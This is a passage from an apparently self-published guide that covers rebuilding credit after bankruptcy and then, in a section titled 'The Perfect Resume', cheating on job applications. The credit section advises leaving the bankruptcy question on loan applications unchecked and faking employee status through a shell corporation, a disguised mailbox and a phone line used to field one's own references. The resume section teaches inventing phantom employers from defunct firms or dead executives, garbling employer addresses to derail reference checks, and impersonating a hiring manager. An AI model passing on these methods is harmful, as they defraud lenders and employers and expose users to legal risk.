free of those +old financial entanglements. You breathe a deep sigh of relief. +Unfortunately the creditors may see things very differently. This +may allow your ex to continue to plague your financial life for +years. Their late payments could crush your ability to get a car +loan or a mortgage. Be sure to bring this subject up with your +divorce lawyer and follow their instructions. +Contact your creditors and explain the situation. Close out any +accounts that were jointly held. But some problems may surprise +you. Before splitting an account a creditor has the option of pulling +both credit records in an effort to determine their individual credit +worthiness. +Should you wish to dump a debt on the ex that created the debt, +you may run into a problem. If their credit rating, on an individual +basis, is in the eyes of the lender deficient – you may be stuck +with half or worse, all of the debt. +Pre-application Intelligence +As I’ve said, you should only apply for credit you know you’ll have +no problem obtaining. There are three major credit reporting +agencies but most lenders are members with only one. +Before applying, call their office and ask anyone you can get on +the phone which credit bureau they use. If they say they don’t +know or attempt to ignore your request – politely but firmly +demand that they find out and call you back. +Then request a copy of your file with that bureau and correct any +problems at least a month before you submit your application. In +this way you can stay on top of the entire process. +Rebuilding Your Credit After Bankruptcy +Here are the hardcore tactics that will rebuild a credit rating even +after you’ve filed for personal bankruptcy relief. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 231 - +Reproduction in any form is prohibited without written permission. + +Unless your bankruptcy is caused by illness or other +uncontrollable events, your spending habits are probably your real +problem. It's common for bankruptcy attorneys to see individuals +and couples who come back to file their second bankruptcy again +one or two years after filing their first bankruptcy. +In those cases it's clear that they didn't do any really constructive +soul searching. To be successful in rebuilding your life, you're +going to have to forever change your relationship with money and +that includes your spending habits. +It's kind of like alcoholics and their booze. If you can't or won't +change, chances are you'll just end up in the very same jam in a +few months time. +Believe me the effort is worth it, no matter how painful. Can you +imagine how great it will feel to be completely out of debt, able to +answer the phone whenever it rings, not be afraid of your mailbox +and free to think of other things than next month's bills? You made +some errors and nothing I can tell you will help one bit if you're not +ready to make some changes. +Contrary to what friends may have told you, there is credit after +bankruptcy. But like rebuilding a house after a storm, you're going +to have to do some work. +Don't think for a single moment that the world owes you +something. That your bankruptcy entitles you to some special +privileges, because it doesn't. In the eyes of the world you +screwed up. As a result the financial world has turned it's back on +you and regards you as unreliable. +Now the pressure is on you to prove to all those lenders out there +that your bankruptcy was an isolated fluke. That you are, in reality, +a responsible person who can manage your own affairs quite well, +thank you. +Two Years Exile +Now for the hard facts. Getting credit during the first 24 months +following your bankruptcy discharge will be difficult and expensive. +Today, with the number of bankruptcies swelling, a new industry +has emerged that's eager to do business with you. +Of course, they don't trust you, will put you on a very short leash +and will charge you huge fees and very high interest rates as +you're now a high risk customer. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 232 - +Reproduction in any form is prohibited without written permission. + +The good news is, you now have a second chance at life, a new +golden opportunity to rebuild your financial reputation and along +with it your entire life. Don't blow it! You can start to rebuild your +credit right away. If you use this time carefully to restore your +credit, in two years you'll be able to use credit in much the same +way everyone else does. +Quality is what you're after now. You want to open accounts with +high quality lenders. Major auto manufacturers, large banks, major +credit cards etc. +You'll want to stay completely clear of those sleazy places that +appear as though they want to help out those with poor credit. +Easy credit car lots (We finance anyone!), storefront loan +companies, payday loan outfits, and those appliance rent-to-own +places. They're vultures that will suck you dry and keep you +locked into a world of poor credit. +Having a payment record from one of them on your credit file +would be a disaster, even if the payments were made on-time. +Major lenders will notice if one of these unsavory firms appears on +your credit history and will think much less of you as a result. +Fact is, few of these parasites ever bother to report your payment +history to any credit bureau anyway. Stay away from them, now +and forever. +If you want to buy a home complete with a mortgage at normal +rates, you'll need to wait until 24 months have passed and have at +least three high quality credit references on your record each +showing a 100% on-time payment history. You'll be in good shape +then. This should be your goal during those critical first months. +If you must get credit before your 24 month anniversary, you can +expect to pay for it big time. And chances are you won't be dealing +with a major creditor. But if you must, the option is always there. +If you want a house, waiting is by far the best approach. Buying +before your 24 months are out means you'll be locked into a high +interest loan and will probably have to put down a much higher (up +to 20%) down payment which will certainly present a major hurdle +at this stage of the game. +If you can, start to save a few bucks. I'll assume that your first +major purchase will be a car and you'll need some down payment. +$500 to $1,000 would be best. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 233 - +Reproduction in any form is prohibited without written permission. + +Chapter 13 bankruptcies are terrible when it comes to rebuilding +credit. After a chapter 7 discharge you're free to pursue credit in +any way you choose. During those long repayment years under a +Chapter 13 five year long repayment plan, you'll actually have to +have court permission to apply for any kind of credit! +This is a real problem that can keep you locked in financial limbo +for years to come. This is yet another reason why chapter 7 is +preferable to chapter 13. +Some creditors will lure you in with tempting promises only to +require a co-signer at the last moment. Don't fall for this ploy. They +are taking advantage of your situation. They want to use your past +as a excuse to raise rates and down payments and then protect +themselves by forcing you to bring a friend or relative into the deal +at the last moment. Including a co-signer does nothing to help +rebuild your credit and it may even cost you a friend in the +bargain. +Where to Live +The best location for rebuilding your credit will be a large city. +There you will find bankers and others who understand where +you've been and how best they can help you and make a profit at +the same time. +You'll find much more flexibility in a large metropolitan area than +you'll ever find back home in Mayberry where the rules are often +much more restrictive. (Most small town banks will refuse to lend +money to anyone with bad credit or a bankruptcy on their record) +In your present situation large big-city car dealerships can help +you get your lease or purchase financing pushed through using +their massive purchasing power as leverage. +Next you'll definitely need a copy of your credit report from all +three of the top credit reporting bureaus. When a creditor requests +a copy the bureau records the request as an "external request". +Just having someone look at your report can count against you. +The best tactic is to carry copies of your reports with you. When +you get down to discussing loan terms, you can pull out a copy. It +will help speed things along and will help you overcome your +situation. It will also keep them from requesting tons of copies and +damaging your record in the process. +TransUnion 800-888-4213 +Equifax 800-997-2493 +Experian 800-311-4769 +© Copyright 2011, Ariza Research, All rights reserved - ABP - 234 - +Reproduction in any form is prohibited without written permission. + +Note: These bureaus often have separate numbers they use for +complaints or error correction - ask for that number also. +If you're married you're facing a much more complicated situation +as you'll need to rebuild both credit ratings. This will take some +planning. +Be sure to spread out the applications so that both of you +accumulate the high-quality references you need. It's a common +error for a couple to concentrate on rebuilding only the man's +record. Instead be sure to file for both individual accounts in +separate names and at the same time pursue credit jointly. +Do the same with your bank accounts as you'll both need bank +references later on down the road. Check with your attorney but in +most cases it's best to pursue a mortgage in joint name. All this +will come in handy when you apply for a large loan. Having two +responsible individuals on an application will appear much more +credible than just one. +If you apply for credit and are turned down, the creditor is required +to send you a notification that lists the credit bureau(s) they used +in making their decision. You then have from one to two months to +request a copy of your report - free! +Or you can purchase copies on the web directly from the three +major agencies. (Never use other firms that offer to provide you +with a combined report listing data from all three credit reporting +agencies. This may look convenient but your most personal +information will be going through the hands of people you do not +know. There have been cases of identity theft with people who +have used these outfits) +In addition, when you personally request a copy of your report +directly from a credit agency the report is recorded as a “soft pull” +which means it won’t count against your credit rating. +But if some third party requests your report, it will be recorded as +a “hard pull” which will be recorded in the same way as any +business pull. +For this reason (and others) you should obtain your own records. I +know it’s tempting to have all three reports put together on a +single form, but that convenience comes at too high a price. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 235 - +Reproduction in any form is prohibited without written permission. + +Applying for Credit After Bankruptcy +Now we get down to brass tacks. Here are some tips on how to +approach filling out a credit application. Start out by having copies +of your bankruptcy discharge notice and your three credit bureau +reports with you when applying for credit. +Be ready to explain orally and on paper, exactly why you were +forced to resort to bankruptcy. Don't lie but you should emphasize +those factors that others can sympathize with. +If illness or a legal problem not of your making was involved even +in a minor way - mention it. But be positive, not negative. +Don't get into the "blame game" in an attempt to transfer blame for +your acts to others. This will only make you look immature and +childish. Face the music like an adult and admit that you made +mistakes but mention the other factors also - not as an excuse but +instead as an explanation. If your past includes problems with +drugs, arrests, booze, or mental health problems – keep that +information to yourself! +If you're at a loss as to what to say exactly, you might want to ask +the loan officer for some suggestions. After all he/she has seen +tons of these applications and will know what kind of language will +help grease the skids. Or you might want to ask their opinion of +what you write. Most will be willing to edit your comments in +helpful ways. +You will also be required to list your recent (since discharge) credit +history. Have this information with you preferably typed up on a +single page that you can show a loan officer. +Be truthful (except for one question we'll discuss later). The more +organized and truthful you appear now, the better. This will +increase creditor confidence in your sense of discipline. +Loan officers are like cops when they conduct interrogations. +Should they uncover a small lie, they will automatically assume +there are others perhaps even bigger ones. When every little +detail is truthful, neat and proper, they'll assume they're dealing +with an honest man. +Be sure to answer all questions. Leave no blanks as that will +subtract from the image you want to project. Should the form +include the dreaded check box with the question "have you ever +filed bankruptcy?". You'll need to decide the best course. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 236 - +Reproduction in any form is prohibited without written permission. + +I've found it constructive to leave the block unchecked and +honestly reveal my personal situation to the loan officer face to +face. +That way you've been open and honest and have placed the +whole matter in his lap. Some "company men" will fill check the +box for you but many loan officers will white-out a checked box +simply because they want the deal approved and know that the +empty-headed paper shufflers back in the home office will +automatically reject any application they receive with that +particular box checked. +Your employment record should show two trends. First, even +though it's fast becoming a dominant trend, you should avoid +changing jobs too often. And secondly, be sure to stay employed +in your same field. +Loan officers hate to see applications from job hoppers who also +hop fields. Stay put for now, at least until you get the car(s) and +home you need, then you can change jobs whenever you like. +Before applying for credit you might want to call the firm and ask +which credit reporting bureaus they use. You may find that most +businesses in your hometown use one of the three majors almost +exclusively. +On an application the following can cause you problems: +Self-employed (You can still borrow but the extensive +paperwork requirements will drive you dizzy) +No telephone listed in your name (They’ll wonder where +you really live) +Carrying too much debt (Over 35% of your income - not +including rent/mortgage) +Not a US citizen or permanent resident alien status +(You might go back to where you came from) +Lack of good employment skills (Minimum wage jobs +won't work here) +Unverifiable employment (How are they to know you +have any real income with which to repay their loan?) +Lack of good banking reference (including both checking +and savings account) +Gaps in working history/too much job switching +© Copyright 2011, Ariza Research, All rights reserved - ABP - 237 - +Reproduction in any form is prohibited without written permission. + +Here's the best way to handle being self-employed. Loan officers +accept W-2s as proof of your income and job security. W-2s make +them feel all warm and fuzzy. Any other proof is suspect and +usually unacceptable. +This is really a very silly requirement when you stop to realize how +fragile most people’s jobs really are. Many people are being laid +off or down-sized each and every day in this country. But this is +their attitude nonetheless. As a self-employed person you'll be at a +decided disadvantage if you can't give them what they want. +If your business is an unincorporated sole proprietorship or +partnership, perhaps you should consider forming a corporation as +corporate papers are much more influential in financial circles. +Check with your lawyer or accountant first and if it's in your +interest - go ahead and create a new corporation. Be sure your +new firm has a business-like name that doesn't include your +name. "National Transportation Associates, Inc." sounds much +better than "Sam Johnson Enterprises, Inc." +Then you can set yourself a fixed salary and cut your own W-2s. +Your corporate address should be one of those rented PO box +outfits like Mailboxes Etc... where you can use their street address +which will conceal the fact that you're using a PO box. +Then call your local phone company and request a "stand-alone +phonemail" number. This will give you a number that acts like an +automated answering machine. Over your phone you access the +menu and record a greeting. +The stand alone version of phone mail differs from an answering +machine in one critical way - it isn't connected to your home phone +and has it's own discreet local number (or a toll-free number for a +higher fee). +People call and leave messages. You call a separate toll-free +number to retrieve your messages. But the important thing here is +that you now have an verifiable business phone number which +adds to your image as an employee, not a self-employed person. +And if someone should call for a credit reference, you will get the +message yourself and can handle it any way you choose. +If you make a mistake and get declined for a loan, be sure to +question them carefully to find out exactly what happened and +why. Ask them what factors went into their decision and then be +sure to obtain the free copies of your credit reports you're entitled +to. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 238 - +Reproduction in any form is prohibited without written permission. + +Credit unions are great if you want a low-interest rate car loan or a +low-rate credit card but there is one problem with them. Call the +one you are considering and ask them if they report their loan +payments to the credit bureaus. +If they waffle on their answer, ask to talk to a supervisor or branch +manager. If they can't give you a solid answer, move on to the +next one. +You should also note that some creditors are more eager to deal +with you than others. Generally the largest single bank in town is +probably the most difficult place for you right now. Smaller banks +launch promotions aimed at landing new loans and accounts. +Watch your paper for ads. You'll find a much more willing banker +in one of these smaller, hungrier banks. +When you've chosen a bank you wish to open an account with, +call them first. Ask if they offer a secured MasterCard or Visa. Do +they automatically issue a debit card on new accounts (or do they +require a credit report?). Do they charge for ATM use? (some +banks charge incredible fees for simple ATM use) +After you've opened your account, you should be aware that some +banks won't allow you to have checks printed with any other +starting number above 001. This is a problem as retailers can balk +when presented with a low-numbered check. Always start your +checks off with 301 or 401 for this reason. +If the bank won't allow you to choose your own starting number, +tell them you'll have your checks printed by your own favorite +printer. Almost all printers print checks and couldn't care less what +numbers you use. (checks ordered through banks are prohibitively +expensive anyway) +How can you find a flexible banker? Call your bankruptcy lawyer +and ask for a reference. Call any friends you have that have had +financial problems in the past. Don't worry if you have to travel +cross town to get the account deal you want. Chances are that +same bank has a branch near your home which is where you'll be +doing your banking. +One tactic is to boldly tell your hopefully flexible banker that you +have a bankruptcy in your past but are eager to rebuild your +credit. Can they offer any advice as to how their bank could help +you? +You may be pleasantly surprised to discover they have special +programs designed for people just like you! (some particularly +friendly banks offer various packages they call "Credit Builders") +© Copyright 2011, Ariza Research, All rights reserved - ABP - 239 - +Reproduction in any form is prohibited without written permission. + +Ask if they offer secured credit cards or secured loans which can +provide you with a royal road to a great new credit rating. +A secured credit card will help you obtain a traditional unsecured +card and a secured loan will require that you open a savings +account. Most credit applications ask if you have a savings +account and now you'll be able to say yes which will help boost +your credit rating. +Be sure to ask your new banker how much you'll have to have +deposited in your new account before they will waive your monthly +fee. Around $1,000-$1,500 is the norm. Some smaller savings and +loans offer fee-free banking to any and all comers. Few banks +charge ATM fees for their own ATMs. And you should always fill +out an application to cash checks at your favorite supermarket +which is a handy way to buy food and get some spending cash at +the same time. +Buying a Home With Bad Credit +First, wait two years. Getting a mortgage is possible during the +first two years but be prepared to put down either 15 or 20% in +cash. And you can expect to pay a much higher interest rate. +Wait two years, accumulate three or more high-quality credit +references and you'll do much better. And since a home mortgage +is a long term investment - it would be much wiser to bide your +time and not jump the gun. +Besides, after those first two years you'll be eligible for a FHA or +conventional mortgage under much better, even normal terms. +Most people live very frugally those first 24 months, saving as +much as they possibly can. +If you've been busy building your credit with a minimum of three +good accounts, have paid your bills on time without fail, have +stayed employed in one field and preferably in one job, have no +negative entries in your credit files, haven't run up your debts too +much, and have sufficient income and a down payment - you +should be able to land a very nice mortgage without too much +trouble. +If you're having IRS problems, it's best to enter into some sort of +payment history at least six months before you apply for the +mortgage. This will show that you're paying it off without any +problems. But be very careful that the feds don't damage your +credit rating as any entry they cause could destroy your chances. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 240 - +Reproduction in any form is prohibited without written permission. + +You might want to check and see if there are any state "first time +home buyer" programs offered where you live. Today you can +check the state's official web site and/or call them and ask. Most +states have a program or two but don't advertise them very widely +so you may stumble on a gem. +Then there is the land contract purchase. States have various +attitudes about land contracts (ask a realtor to explain your state's +position) but if your credit is shot, it may be just the thing for you. +Be extremely careful to make your payments on time. Especially +during the first year, as any late payments may lose you your new +home and your money. +After the first one or two years your lender should be convinced of +your reliability and be willing to convert your land contract into a +conventional mortgage. Realtors are your best contact for this kind +of deal. But you've got to find a creative one, one experienced +enough to know the ropes. +If you can plop down 15-20% down in cold hard cash, you can +probably get a mortgage no matter your credit rating. But be +warned that the bankers may ask you to prove where you got the +money. A friend skimmed his cash tax free from his videotape +rental store. When the banker asked about the money's source, +he was speechless. Be prepared to document every penny. +FHA assumable mortgages might work for you if you have the +"cash to mortgage" required to buy out the present owner's equity. +If you do, you can have a realtor locate suitable homes for you. If +interest rates are high when you're looking - you should find plenty +of owners desperate to sell in this way as they need to more to +some other area of the country. +Since a realtor really doesn't have anything to do with your +mortgage, they need not know that your past includes a +bankruptcy. If you volunteer the information, they may run for the +hills as nothing frustrates a realtor more than putting together a +deal the buyer can't qualify for. That's why today realtors are +requiring prospects to obtain mortgage pre-qualifications before +they will work with them. +Leasing or Buying a Car After Bankruptcy +Cars are no luxury in our society. They are a real necessity unless +you live and work on a bus line in a major city, which few of us can +boast. Even though you've been through a bankruptcy, you have +options. You don't have to get your wheels from one of those "we +finance anyone" thieves. Instead you can deal with a major +dealership, in fact the larger the dealer the better. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 241 - +Reproduction in any form is prohibited without written permission. + +Foreign cars are hot today. The most popular car in the country is +the Toyota Camry. So Toyota dealers can afford to be a bit picky +about who they sell or lease to. +The salespeople over at your local Ford and GM dealer are much +hungrier and more willing to work with you. And some of the cars +aren't all that bad. I'm not a Ford man, but the Ford Taurus is +rather nice, not fancy but it's comfortable enough and is well- +made. The Sable is the same car with all the luxury trimmings. On +the GM side the small Saturn is very well made and gets high +marks by various rating magazines. +Once again, some auto financing firms will reject you out of hand if +they know you've been involved in a bankruptcy. So do as you did +before, leave that little check box after the question "have you +ever filed bankruptcy" empty. +Tell the leasing manager your story and ask him what you should +do. Unless he's a mindless company man, he'll not only let you +slide, he'll arrange and orchestrate it. After all he wants that +sale/lease deal to go through. It's in his interest and he knows on +which side of the bread the jam resides. +Large dealerships have more leverage with the manufacturer's +financing firm. Because they move more volume than the smaller +dealers, they have more leverage when it comes to getting +marginal applications (like yours) approved. And the best part +here is that you're financing your car through one of the most +respected creditors on the planet which will give you a solid gold +credit reference! +Be very careful however. The salesman may smile and process +your application only to tell you later that he was forced to submit +your application to a special high-risk creditor instead of the usual +name-brand firm. This is a trap you don't want to fall into. You'll be +paying more and you'll get a lesser known creditor listing on your +credit file which you should avoid. Make it clear that you're only +interested in financing through Ford Motor or GM Acceptance. +Instead, offer to make a down payment. It would be unrealistic for +you to expect a no money down deal at this stage of the game. If +you can get your hands on a total of $1,500, tell them you can +come up with $750 or $850. Later if there's a problem you can +offer to come up with a larger down payment which should give +the salesperson just what they need to close the deal. +Do not hand over your credit card or give them your social security +number until you have an understanding with them that they are +not to generate any "external inquiries" on your credit file until the +deal is almost complete. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 242 - +Reproduction in any form is prohibited without written permission. + +Too many such inquiries will work against you and you may have +to visit two or three dealerships before you complete a successful +transaction. +If a payment from GM was included in your bankruptcy, I'd forget +them at least for now. Or if you ever paid a loan late to any +division of GM the same would apply. They have long memories +those computers. +Determine in advance how much of a payment you can afford, +then stick to your guns. Don't let them push you into paying more +than you can afford as that will endanger your temporarily fragile +financial situation. +Beware of dealers that sell cheap cars or cars that have just +arrived in the market place from new manufacturers. These days +KIA is offering to finance anyone who can walk in the door. But the +problem is - their cars are not well respected. They offer a great +warranty because their cars aren't very reliable. Check with +Consumer Reports and you'll see what I mean. They're financing +is low-quality and you don't want it on your credit file. +Sometimes a well-known bank will step into the high-risk market in +the search for increased earnings. If your salesman mentions a +special bank program, quickly ask the name of the bank. If you +don't recognize it instantly - steer clear unless you have to. +Ford and GM both have a short term lease for their higher risk +customers. It's only two years long. Perhaps that would be perfect +for you as you'll probably be in a position to purchase or lease a +much better car by the time your lease expires. And if you make +all your payments on time and return the car in excellent condition +(they'll charge you like mad if you don't) you will become a "gold +key" customer and they will treat you like a king. You can have +your pick of any car on the lot! The financing will be arranged in +minutes, not days. +Keep in mind that GM now owns Hyundai and Ford now owns +Mazda and each shares a common financing system. So your +next car may be a nice foreign job. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 243 - +Reproduction in any form is prohibited without written permission. + +The Perfect Resume +by Jim & Susan Petersen +May you live in interesting times.… +- Ancient Chinese Proverb +© Copyright 2010 – Ariza Research – All Rights Reserved - ABP +Disclaimer: +Do not break the law. This publication is being sold for academic, +educational and entertainment purposes only. Nothing in this publication +is intended to encourage illegal or immoral acts now or at any point in the +future. Securing employment through deceptive means may violate +various local and federal laws. Always consult with an attorney familiar +with laws in your local area before attempting to employ any of the +techniques discussed in this report. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 244 - +Reproduction in any form is prohibited without written permission. + +Resume Secrets +To Lie or Not to Lie? +Let me say at the outset that I cannot, in good conscience, +advocate lying or cheating in any form including on a resume. But +in our less than perfect world it sometimes becomes necessary to +massage the truth a bit in order to smooth our path and put the +wind at our backs. +In this report I’m going to give you a variety of inventive ways to +cheat on a resume. But since everyone’s situation is unique, you +alone must be the final judge of which you’re willing to use and +which you’re not. +At this point you’ve probably seen an advertisement for an open +position you may be interested in, or perhaps have been in touch +with an employment agency or headhunter and so are now ready +to submit your resume. At this early stage you have two factors to +consider. +First there’s your innate sense of morality. Since there are no laws +that specifically prohibit employing deception on a resume, in the +final analysis the only limit on your dishonesty will spring from your +own intrinsic sense of what’s right and what’s wrong. +Secondly there’s the matter of your future plans regarding this +particular target employer. If this time around your target employer +is only one of many firms in your area and you have little if any +expectation of applying to them in the future, you’re free to get as +tricky as your personal moral code allows. In this case, if your +deception should be discovered during the application process, +little will be lost. +If, on the other hand, your target employer is a large one and a +major force in your community - one that you may very well be +applying to again at some point in the future, your use of +misinformation will have to be more conservative and calculated. +Remember, one of the first questions on most employment +applications is “have you ever applied for employment with ABC, +Inc. before?” Should you “blow it” and have your deception +discovered, you’ll most likely permanently destroy any chance of +future employment there. This may be one bridge that you can’t +afford to burn. +Since there are no specific legal penalties for cheating on a +resume, almost everyone does it. One study found that over 95% +of resumes contain some degree of exaggeration, while more than +15% contained major falsehoods such as fraudulent academic +credentials or phantom employers. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 245 - +Reproduction in any form is prohibited without written permission. + +If exaggeration is so common that prospective employers +anticipate it, why should you buck the trend and limit your +prospects by being absolutely honest? +While most of us struggle to live our lives according to the golden +rule, our modern society often requires that we be less than totally +honest. Recently I got involved in a minor traffic accident. I called +a local body shop and asked if they could provide a loaner car +while my car was being repaired. They said yes. +But when I showed up the next morning I was required to sign a +rental contract that included a paragraph stating that the insurance +on the rental vehicle would be null and void if I had been involved +in an automobile accident anytime during the previous six months! +This is insane, I thought! This place is a body shop! Everyone who +rents these cars has had a recent accident! I signed the document +and drove very carefully. Such are the times in which we live. +This “mandatory dishonesty’ can be found in abundance in today’s +the job market. It’s inevitable that most Americans have +accumulated a few employment problems along the way. These +career flaws will need to be smoothed over somehow or even +completely covered up. +Another factor that should be considered is the prospective +employer’s commitment to openness and honesty. In my +experience very few employers will fully reveal any unpleasant +details affecting the positions they advertise. Perhaps your future +boss or co-workers are complete bastards. Perhaps they know +that the division you’ll be working for will soon be eliminated, or +perhaps the entire corporation is in financial trouble and will soon +be laying off large numbers of employees. +In cases like these, you can bet that the hiring corporation will +seldom let issues like fairness and morality get in their way. They +need to fill the job and get on with their business. It’s a sad fact +that corporations are seldom completely honest when it comes to +the information that an applicant needs to make an intelligent +decision about the desirability of the position. It seems very +hypocritical for a prospective employer to insist on applicants +being entirely honest while they regularly conceal relevant job +details. +Also it’s vitally important to remember that the entire application +process has to be kept entirely positive. Introduce even the +slightest bit of negative information into the process and you can +bet they’ll drop you like the proverbial hot potato. This report was +conceived and created to help job hunters thrive in this skeptical +and hypocritical employment environment. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 246 - +Reproduction in any form is prohibited without written permission. + +Before We Begin +Unlike other areas of life, when it comes to resume preparation +there are few hard and fast rules. Instead you’ll find that the few +rules that do exist are cast in shades of gray. And while it’s +certainly true that you can get away with a great deal, you need to +be aware of some pitfalls before you begin. +Should you decide to employ minor deception in the seeking of a +position, it’s unlikely that you’ll experience any future problems. +And, should you employ a moderate degree of deception and +subsequently perform well on the job, once again you’ll have few +problems. +But - should you manage to cheat your way into a job that’s clearly +over your head and later have your deception exposed, you could +find yourself in considerable legal trouble. +Remember that by inserting a major falsehood into your resume, +you’ll have to learn to live with a ticking time bomb that could go +off at any moment. If you decide that your situation warrants using +deception and are convinced that you can handle the +psychological stress that goes with living a lie, whatever you do - +keep your deception to yourself! By sharing this potentially +explosive information with anyone you’ll be handing him or her a +weapon with which they can very easily destroy you. +Before you even consider cheating on your resume, it’s also +necessary that you know exactly what sort of environment you’ll +be operating in. In the old days anyone interested in hiring you +could phone up any of your former employers and openly inquire +as to your job performance, attendance, personal habits, +personality, political affiliations, race, religion or any other factor +the caller might consider relevant. In short, your personal life was +an open book. +That was then and this is now. Today lawyers rule the world. In +the current legal environment an executive that reveals even the +most seemingly innocent shred of personal information about a +former employee may expose his firm to a multi-million dollar +lawsuit. Personnel executives are aware of this and so now +behave more like scared rabbits than captains of industry. +They know that performing a reference check today is like tap +dancing through a minefield. Happily, this paranoid atmosphere +plays right into the hands of the resume cheater. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 247 - +Reproduction in any form is prohibited without written permission. + +In one extreme case a nurse was fired from a major urban hospital +under a dark cloud of suspicion. Hospital officials there suspected +that she was performing her own “mercy killings” by unauthorized +overdosing of patients with narcotic pain killers. When she applied +at a new hospital in another state they called for a job reference. +Fearing an expensive law suit the major hospital confirmed her +employment dates, job title and chose to provide no further +information concerning her termination. The sad ending of this +story is that she landed the new job and went on with her personal +euthanasia project at her new hospital and killed another dozen +patients before she was finally arrested and jailed. This shocking +tale only goes to prove my point. +Employers are scared to death of employment references and +aren’t very eager to share notes these days. +And here is some more good news. In these times of tight +budgets, most employers are cutting back on background +investigations. +Many employers have replaced systematic background checks +with spot-checks that only check a fraction of the information on +your resume/employment application. And then they act so +amazed when someone slips something past them. +Always remember how to smoothly back out should things go +awry. Chances are that if a prospective employer smells a rat, he’ll +simply stop calling. But if he should call and confront you with +questions you’d rather not discuss, immediately inform him that +you’d like to provide him with an answer but unfortunately you’ve +just accepted a position with another company. Just back out as +gracefully as possible. There are too many less careful firms out +there to have to deal with difficult questions. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 248 - +Reproduction in any form is prohibited without written permission. + +What They Know and What They Don’t… +Before we delve into a detailed discussion of cheating techniques, +you’ll need to know exactly what a hiring executive can and can’t +find out about you. Keep in mind that all information outside of the +following parameters is fair game for exaggeration. A standard +employment reference will usually provide the following +information: +1. An employment confirmation +– Yes, he did work for us +2. The dates of employment +– The first and last days worked +3. The job title of the most recent position +occupied +Due to the oppressive legal environment in which we live, this is +where most references will end. There’s one more bit of +information an astute caller may request however – your rehire +status. Did you leave the firm on good terms – positive enough +that they would consider hiring you back at some point in the +future? About half of the firms we interviewed said they would +cooperate and provide this additional piece of information. +Given the inability of the caller to get the full story if the rehire +status comes back negative, he’ll understandably assume the +worst. As a result, a negative rehire status is therefore the +proverbial “kiss of death”. Which explains why it’s so important to +confirm your rehire status before you leave an employer. +Since anyone interested in hiring you can and will be able to +obtain your dates of employment and job title, this leaves a great +deal of room for exaggeration or, if necessary, even outright +fabrication. The specific job duties or responsibilities can be rather +freely expanded as can your former salary. You might also get +away with some minor extension of the period of employment +should you wish to cover up a gap in your employment history. +If you’re not sure exactly how one of your former employers will +respond to a reference call – call them yourself! Pose as a hiring +manager and ask for a reference on yourself and see what they +say. Whatever they say, probe them and ask for more information. +If they sing your praises or at least give you the standard positive +reference, you’re all set. But should they say anything that is at all +negative, promptly write the personnel director a personal letter. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 249 - +Reproduction in any form is prohibited without written permission. + +Say that you were disappointed to learn that they had given out a +slanderous reference that recently cost you a lucrative position. +State openly that you’re consulting with legal counsel and infer +that any further negative comments will result in immediate legal +action. It’s standard procedure in most personnel departments to +place a copy of such a letter right on top of your file so that +anyone pulling the file in the future will immediately be confronted +with your letter and will be forced to avoid any negative +comments. +Also, less background checking is being done. Corporations are +now required by federal law to use exactly the same background +checks on all applicants. (In the past it was common practice to +unfairly scrutinize minority applicants) Checking all applicants is +rather expensive these days hence the overall reduction in +investigations. +Every company we polled reported that, according to well- +established written rules, they are required to perform mandatory +employment reference checks on every single applicant. But when +we discussed the subject with a dozen hiring managers in a bar +after a few drinks, an entirely different story emerged. Every one +of them admitted that checks are often either skipped or only +partially completed. +Today’s managers live in a very rushed environment so many +managers simply can’t find the time to place the repeated phone +calls and mail out the reference requests. They also know that +should they make a mistake during a check it could get them into +hot water so they’re more than a little intimidated. +And then there’s that certain macho attitude that they, and they +alone, can confidently extract the best employee from a crowd by +“gut feel” because they’re a such a “good judge of character” and +so have no need for further data. Several managers with +extensive hiring experience admitted that they had yet to perform +their first reference check! Just be aware that for whatever reason +– many checks never get made. +If you chose to include career accomplishments on your resume, +they must be specific. Vague or inexact accomplishments are +worthless and will certainly lead to a detailed discussion. Be +careful with accomplishments, as you must be prepared to answer +detailed questions. +Should you indicate that your last employer is a firm right down +the road, +© Copyright 2011, Ariza Research, All rights reserved - ABP - 250 - +Reproduction in any form is prohibited without written permission. + +It’s very likely that a prospective employer will go ahead with a +check. But by simply listing a firm in another state, you somewhat +reduce the odds that a prospective employer will either actually go +ahead with the check or get the reference check back (via mail) in +time to be used in making a decision regarding a job offer. +If you provide a slightly altered address for your former employer, +the mail may go astray. If the address is a PO Box simply switch +two digits of the PO Box number. Otherwise you might try +incorrectly abbreviating the town name and also switching two +digits of the zip code. This may only serve to delay the arrival of a +reference letter, but there’s always the chance that they won’t +even bother to follow up with a second attempt. +Phantom Employer I +Say that you have a former employer on your resume that you +know for certain will not be saying nice things about you. How can +you cover up such a blemish? The most effective means is +through the use of a “phantom employer”. This is a firm that you +list as a former employer on both your resume and employment +application despite the fact that you were never actually employed +by them. +Spend an afternoon in your nearest library reading through recent +issues of the largest newspaper in town. What you’re looking for is +an article about a local firm that recently went out of business. Or +perhaps your previous employer was a company that has recently +undergone a considerable re-organization. +Or one that recently closed down a local office and pulled out of +town. This sort of company makes an ideal former employer +because they are very poor sources of information. +And at the same time you get an excellent reason for leaving the +job. What better reason could there be than having your employer +go belly up or leave town? Or if you would rather have your future +employer think that you’ve only just arrived in town, scan the +microfilms of the biggest newspaper in the town from the area of +the country you want them to think you just came from. +Or you might want to scan the obituaries in search of an executive +from a small company that recently died while still employed. This +guy will make a nifty ex-boss. He was such a nice man and would +have certainly provided you with a solid gold reference if he could. +But then dead men are extremely poor sources of information. +When using this technique you must be sure to avoid larger firms +as they will probably have a personnel department that can and +will provide an employment reference even though your former +boss is six feet under. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 251 - +Reproduction in any form is prohibited without written permission. + +And then there’s the entirely unverifiable foreign employer +approach. Every large city newspaper will contain one or more +classified ads offering jobs overseas. These firms usually sell a +compiled list of foreign positions. It may cost you a few bucks but +if you need to resort to this, it’s worth it. 